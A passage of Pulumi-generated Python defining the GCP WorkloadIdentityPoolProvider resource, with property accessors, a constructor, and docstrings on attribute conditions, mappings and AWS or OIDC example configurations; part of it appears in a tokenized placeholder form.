"""<line_sep><return>pulumi.get(self "oidc")<block_end>@oidc.setter<def_stmt>oidc self value:Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]<block_start>pulumi.set(self "oidc" value)<block_end>@property@pulumi.getter<def_stmt>project self<arrow>Optional[pulumi.Input[str]]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@project.setter<def_stmt>project self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "project" value)<block_end><block_end>@pulumi.input_type<class_stmt>_WorkloadIdentityPoolProviderState<block_start><def_stmt>__init__ __self__ * attribute_condition:Optional[pulumi.Input[str]]=<none> attribute_mapping:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> aws:Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]=<none> description:Optional[pulumi.Input[str]]=<none> disabled:Optional[pulumi.Input[bool]]=<none> display_name:Optional[pulumi.Input[str]]=<none> name:Optional[pulumi.Input[str]]=<none> oidc:Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]=<none> project:Optional[pulumi.Input[str]]=<none> state:Optional[pulumi.Input[str]]=<none> workload_identity_pool_id:Optional[pulumi.Input[str]]=<none> workload_identity_pool_provider_id:Optional[pulumi.Input[str]]=<none><block_start>""" Input properties used for looking up and filtering WorkloadIdentityPoolProvider resources. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. 
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. 
For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input['WorkloadIdentityPoolProviderAwsArgs'] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. 
:param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input[str] name: The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. :param pulumi.Input['WorkloadIdentityPoolProviderOidcArgs'] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] state: The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. 
"""<if_stmt>attribute_condition<is><not><none><block_start>pulumi.set(__self__ "attribute_condition" attribute_condition)<block_end><if_stmt>attribute_mapping<is><not><none><block_start>pulumi.set(__self__ "attribute_mapping" attribute_mapping)<block_end><if_stmt>aws<is><not><none><block_start>pulumi.set(__self__ "aws" aws)<block_end><if_stmt>description<is><not><none><block_start>pulumi.set(__self__ "description" description)<block_end><if_stmt>disabled<is><not><none><block_start>pulumi.set(__self__ "disabled" disabled)<block_end><if_stmt>display_name<is><not><none><block_start>pulumi.set(__self__ "display_name" display_name)<block_end><if_stmt>name<is><not><none><block_start>pulumi.set(__self__ "name" name)<block_end><if_stmt>oidc<is><not><none><block_start>pulumi.set(__self__ "oidc" oidc)<block_end><if_stmt>project<is><not><none><block_start>pulumi.set(__self__ "project" project)<block_end><if_stmt>state<is><not><none><block_start>pulumi.set(__self__ "state" state)<block_end><if_stmt>workload_identity_pool_id<is><not><none><block_start>pulumi.set(__self__ "workload_identity_pool_id" workload_identity_pool_id)<block_end><if_stmt>workload_identity_pool_provider_id<is><not><none><block_start>pulumi.set(__self__ "workload_identity_pool_provider_id" workload_identity_pool_provider_id)<block_end><block_end>@property@pulumi.getter(name="attributeCondition")<def_stmt>attribute_condition self<arrow>Optional[pulumi.Input[str]]<block_start>""" [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. 
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_condition")<block_end>@attribute_condition.setter<def_stmt>attribute_condition self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "attribute_condition" value)<block_end>@property@pulumi.getter(name="attributeMapping")<def_stmt>attribute_mapping self<arrow>Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>""" Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. 
For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_mapping")<block_end>@attribute_mapping.setter<def_stmt>attribute_mapping self value:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>pulumi.set(self "attribute_mapping" value)<block_end>@property@pulumi.getter<def_stmt>aws self<arrow>Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]<block_start>""" An Amazon Web Services identity provider. Not compatible with the property oidc. 
Structure is documented below.
        """
        return pulumi.get(self, "aws")

    @aws.setter
    def aws(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]):
        pulumi.set(self, "aws", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        A description for the provider. Cannot exceed 256 characters.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def disabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
        However, existing tokens still grant access.
        """
        return pulumi.get(self, "disabled")

    @disabled.setter
    def disabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "disabled", value)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        A display name for the provider. Cannot exceed 32 characters.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The resource name of the provider as
        'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def oidc(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]:
        """
        An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
        Structure is documented below.
        """
        return pulumi.get(self, "oidc")

    @oidc.setter
    def oidc(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]):
        pulumi.set(self, "oidc", value)

    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")

    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)

    @property
    @pulumi.getter
    def state(self) -> Optional[pulumi.Input[str]]:
        """
        The state of the provider.
        * STATE_UNSPECIFIED: State unspecified.
        * ACTIVE: The provider is active, and may be used to validate authentication credentials.
        * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted
          after approximately 30 days. You can restore a soft-deleted provider using
          UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider
          until it is permanently deleted.
        """
        return pulumi.get(self, "state")

    @state.setter
    def state(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "state", value)

    @property
    @pulumi.getter(name="workloadIdentityPoolId")
    def workload_identity_pool_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID used for the pool, which is the final component of the pool resource name. This value
        should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is
        reserved for use by Google, and may not be specified.
        """
        return pulumi.get(self, "workload_identity_pool_id")

    @workload_identity_pool_id.setter
    def workload_identity_pool_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "workload_identity_pool_id", value)

    @property
    @pulumi.getter(name="workloadIdentityPoolProviderId")
    def workload_identity_pool_provider_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID for the provider, which becomes the final component of the resource name. This value
        must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is
        reserved for use by Google, and may not be specified.
        """
        return pulumi.get(self, "workload_identity_pool_provider_id")

    @workload_identity_pool_provider_id.setter
    def workload_identity_pool_provider_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "workload_identity_pool_provider_id", value)


# NOTE(review): this class appears to be Pulumi-codegen output (CustomResource subclass with
# overloaded __init__ plus _internal_init); prefer regenerating over hand-editing — confirm.
class WorkloadIdentityPoolProvider(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 attribute_condition: Optional[pulumi.Input[str]] = None,
                 attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 disabled: Optional[pulumi.Input[bool]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
                 workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        A configuration for an external identity
provider. To get more information about WorkloadIdentityPoolProvider, see: * [API documentation](https://cloud.google.com/iam/docs/reference/rest/v1beta/projects.locations.workloadIdentityPools.providers) * How-to Guides * [Managing workload identity providers](https://cloud.google.com/iam/docs/manage-workload-identity-pools-providers#managing_workload_identity_providers) ## Example Usage ### Iam Workload Identity Pool Provider Aws Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Aws Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="AWS identity pool provider for automated test", disabled=True, attribute_condition="attribute.aws_role==\"arn:aws:sts::999999999999:assumed-role/stack-eu-central-1-lambdaRole\"", attribute_mapping={ "google.subject": "assertion.arn", "attribute.aws_account": "assertion.account", "attribute.environment": "assertion.arn.contains(\":instance-profile/Production\") ? 
\"prod\" : \"test\"", }, aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", attribute_mapping={ "google.subject": "assertion.sub", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="OIDC identity pool provider for automated test", disabled=True, attribute_condition="\"e968c2ef-047c-498d-8d79-16ca1b61e77e\" in assertion.groups", attribute_mapping={ "google.subject": "\"azure::\" + assertion.tid + \"::\" + assertion.sub", "attribute.tid": "assertion.tid", "attribute.managed_identity_name": \"\"\" { "8bb39bdb-1cc5-4447-b7db-a19e920eb111":"workload1", "55d36609-9bcf-48e0-a366-a3cf19027d2a":"workload2" }[assertion.oid] \"\"\", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( allowed_audiences=[ "https://example.com/gcp-oidc-federation", "example.com/gcp-oidc-federation", ], issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ## Import WorkloadIdentityPoolProvider can be 
imported using any of these accepted formats ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default projects/{{project}}/locations/global/workloadIdentityPools/{{workload_identity_pool_id}}/providers/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{project}}/{{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. 
The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. 
For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. :param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. 
The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><ellipsis><block_end>@overload<def_stmt>__init__ __self__ resource_name:str args:WorkloadIdentityPoolProviderArgs opts:Optional[pulumi.ResourceOptions]=<none><block_start>""" A configuration for an external identity provider. To get more information about WorkloadIdentityPoolProvider, see: * [API documentation](https://cloud.google.com/iam/docs/reference/rest/v1beta/projects.locations.workloadIdentityPools.providers) * How-to Guides * [Managing workload identity providers](https://cloud.google.com/iam/docs/manage-workload-identity-pools-providers#managing_workload_identity_providers) ## Example Usage ### Iam Workload Identity Pool Provider Aws Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Aws Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="AWS identity pool provider for automated test", disabled=True, attribute_condition="attribute.aws_role==\"arn:aws:sts::999999999999:assumed-role/stack-eu-central-1-lambdaRole\"", attribute_mapping={ "google.subject": "assertion.arn", "attribute.aws_account": "assertion.account", "attribute.environment": 
"assertion.arn.contains(\":instance-profile/Production\") ? \"prod\" : \"test\"", }, aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", attribute_mapping={ "google.subject": "assertion.sub", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="OIDC identity pool provider for automated test", disabled=True, attribute_condition="\"e968c2ef-047c-498d-8d79-16ca1b61e77e\" in assertion.groups", attribute_mapping={ "google.subject": "\"azure::\" + assertion.tid + \"::\" + assertion.sub", "attribute.tid": "assertion.tid", "attribute.managed_identity_name": \"\"\" { "8bb39bdb-1cc5-4447-b7db-a19e920eb111":"workload1", "55d36609-9bcf-48e0-a366-a3cf19027d2a":"workload2" }[assertion.oid] \"\"\", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( allowed_audiences=[ "https://example.com/gcp-oidc-federation", "example.com/gcp-oidc-federation", ], issuer_uri="https://sts.windows.net/azure-tenant-id", ), 
opts=pulumi.ResourceOptions(provider=google_beta)) ``` ## Import WorkloadIdentityPoolProvider can be imported using any of these accepted formats ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default projects/{{project}}/locations/global/workloadIdentityPools/{{workload_identity_pool_id}}/providers/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{project}}/{{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` :param str resource_name: The name of the resource. :param WorkloadIdentityPoolProviderArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    # Dispatcher: accepts either the args-object form or the keyword form declared by the
    # two @overload signatures above and routes both to _internal_init.
    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(WorkloadIdentityPoolProviderArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            # Args-object form: expand its fields into keyword arguments.
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 attribute_condition: Optional[pulumi.Input[str]] = None,
                 attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 disabled: Optional[pulumi.Input[bool]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
                 workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Normalize resource options before registration.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the property bag from the given arguments.
            # __props__ is reserved for the opts.id (lookup-of-existing-resource) path.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = WorkloadIdentityPoolProviderArgs.__new__(WorkloadIdentityPoolProviderArgs)
            __props__.__dict__["attribute_condition"] = attribute_condition
            __props__.__dict__["attribute_mapping"] = attribute_mapping
            __props__.__dict__["aws"] = aws
            __props__.__dict__["description"] = description
            __props__.__dict__["disabled"] = disabled
            __props__.__dict__["display_name"] = display_name
            __props__.__dict__["oidc"] = oidc
            __props__.__dict__["project"] = project
            # The two pool/provider IDs are required unless resolving by URN.
            if workload_identity_pool_id is None and not opts.urn:
                raise TypeError("Missing required property 'workload_identity_pool_id'")
            __props__.__dict__["workload_identity_pool_id"] = workload_identity_pool_id
            if workload_identity_pool_provider_id is None and not opts.urn:
                raise TypeError("Missing required property 'workload_identity_pool_provider_id'")
            __props__.__dict__["workload_identity_pool_provider_id"] = workload_identity_pool_provider_id
            # Output-only properties start as None and are populated by the engine.
            __props__.__dict__["name"] = None
            __props__.__dict__["state"] = None
        super(WorkloadIdentityPoolProvider, __self__).__init__(
            'gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            attribute_condition: Optional[pulumi.Input[str]] = None,
            attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None,
            description: Optional[pulumi.Input[str]] = None,
            disabled: Optional[pulumi.Input[bool]] = None,
            display_name: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
